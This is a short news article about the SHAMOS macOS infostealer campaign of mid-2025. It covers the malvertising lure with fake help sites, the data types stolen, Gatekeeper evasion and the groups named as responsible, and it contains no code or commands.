Over 300 Entities Fall Victim to Sophisticated macOS Malware Campaign
Over 300 entities have fallen victim to a sophisticated macOS malware campaign, dubbed SHAMOS, between June and August 2025. The variant of the Atomic macOS Stealer uses AppleScript to steal sensitive data and sends it via curl.
The SHAMOS variant installs itself in the /tmp/ directory, stripping file attributes to evade Apple's Gatekeeper protections. It runs checks to avoid sandboxes and targets a wide range of data, including cryptocurrency wallets, Keychain data, AppleNotes, and browser credentials. The cybercriminal group 'BirdMiner' is behind this campaign, selling access to compromised machines.
CrowdStrike blocked over 300 SHAMOS attacks by another group, 'COOKIE SPIDER', during the same period. The malware was spread via malvertising, luring victims to fake macOS help sites with a one-line install command. Threat actors spoofed an Australia-based store in Google Ads to promote these fake sites, bypassing Gatekeeper checks. The SHAMOS variant can steal data from multiple browsers and cryptowallets, including Electrum, Binance, Exodus, Atomic, and Coinomi.
The SHAMOS campaign highlights the growing threat of macOS malware, with cybercriminals employing sophisticated tactics to steal sensitive data. Security experts urge users to be cautious when browsing and to keep their systems updated to protect against such threats.
Read also:
- Pablo Escobar's Former Estate 'Hacienda Nápoles' to Be Transformed by Women's Organization
- Emergency services of the future revealed by Renault with the introduction of the Vision 4Rescue vehicle.
- Dortmund Customs Find Wage, Employment, and Benefit Fraud in Hotel and Gastronomy Sector
- SonicWall executive Michael Crean discusses the current state of managed security
